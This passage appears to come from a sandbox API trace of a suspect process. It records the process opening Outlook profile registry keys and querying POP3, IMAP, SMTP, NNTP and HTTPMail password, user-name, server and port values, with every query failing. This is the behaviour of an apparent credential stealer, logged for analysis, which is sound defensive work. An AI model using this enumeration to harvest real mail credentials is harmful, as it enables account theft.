phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.223] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.223] RegCloseKey (hKey=0x95c) returned 0x0 [0249.223] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.223] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.223] RegCloseKey (hKey=0x95c) returned 0x0 [0249.223] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.223] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.223] RegCloseKey (hKey=0x95c) returned 0x0 [0249.223] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.223] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.223] RegCloseKey (hKey=0x95c) returned 0x0 [0249.224] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.224] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.224] RegCloseKey (hKey=0x95c) returned 0x0 [0249.224] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.224] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.224] RegCloseKey (hKey=0x95c) returned 0x0 [0249.224] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.224] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.224] RegCloseKey (hKey=0x95c) returned 0x0 [0249.224] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.224] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.224] RegCloseKey (hKey=0x95c) returned 0x0 [0249.224] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.224] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.224] RegCloseKey (hKey=0x95c) returned 0x0 [0249.224] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.224] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.224] RegCloseKey (hKey=0x95c) returned 0x0 [0249.224] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.224] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.224] RegCloseKey (hKey=0x95c) returned 0x0 [0249.225] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.225] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.225] RegCloseKey (hKey=0x95c) returned 0x0 [0249.225] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.225] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.225] RegCloseKey (hKey=0x95c) returned 0x0 [0249.225] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.225] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.225] RegCloseKey (hKey=0x95c) returned 0x0 [0249.225] LocalFree (hMem=0x5d67060) returned 0x0 [0249.225] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x9, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="9375CFF0413111d3B88A00104B2A6676", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.225] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.225] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d68100 [0249.225] wsprintfA (in: param_1=0x5d68100, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0249.225] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.225] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.225] RegCloseKey (hKey=0x95c) returned 0x0 [0249.225] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.225] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.225] RegCloseKey (hKey=0x95c) returned 0x0 [0249.226] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.226] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.226] RegCloseKey (hKey=0x95c) returned 0x0 [0249.226] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.226] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.226] RegCloseKey (hKey=0x95c) returned 0x0 [0249.226] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.226] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.226] RegCloseKey (hKey=0x95c) returned 0x0 [0249.226] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.226] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.226] RegCloseKey (hKey=0x95c) returned 0x0 [0249.226] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.226] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.226] RegCloseKey (hKey=0x95c) returned 0x0 [0249.227] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.227] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.227] RegCloseKey (hKey=0x95c) returned 0x0 [0249.227] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.227] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.227] RegCloseKey (hKey=0x95c) returned 0x0 [0249.227] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.227] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.227] RegCloseKey (hKey=0x95c) returned 0x0 [0249.227] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.227] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.227] RegCloseKey (hKey=0x95c) returned 0x0 [0249.227] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.227] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.227] RegCloseKey (hKey=0x95c) returned 0x0 [0249.227] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.227] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.227] RegCloseKey (hKey=0x95c) returned 0x0 [0249.228] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.228] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.228] RegCloseKey (hKey=0x95c) returned 0x0 [0249.228] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.228] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.228] RegCloseKey (hKey=0x95c) returned 0x0 [0249.228] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.228] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.228] RegCloseKey (hKey=0x95c) returned 0x0 [0249.228] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.228] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.228] RegCloseKey (hKey=0x95c) returned 0x0 [0249.228] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.228] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.228] RegCloseKey (hKey=0x95c) returned 0x0 [0249.228] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.228] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.228] RegCloseKey (hKey=0x95c) returned 0x0 [0249.228] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.228] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.229] RegCloseKey (hKey=0x95c) returned 0x0 [0249.229] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.229] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.229] RegCloseKey (hKey=0x95c) returned 0x0 [0249.229] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.229] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.229] RegCloseKey (hKey=0x95c) returned 0x0 [0249.229] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.229] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.229] RegCloseKey (hKey=0x95c) returned 0x0 [0249.229] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.229] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.229] RegCloseKey (hKey=0x95c) returned 0x0 [0249.229] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.229] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.229] RegCloseKey (hKey=0x95c) returned 0x0 [0249.229] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.229] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.229] RegCloseKey (hKey=0x95c) returned 0x0 [0249.229] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.230] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.230] RegCloseKey (hKey=0x95c) returned 0x0 [0249.230] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.230] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.230] RegCloseKey (hKey=0x95c) returned 0x0 [0249.230] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.230] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.230] RegCloseKey (hKey=0x95c) returned 0x0 [0249.230] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.230] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.230] RegCloseKey (hKey=0x95c) returned 0x0 [0249.230] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.230] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: 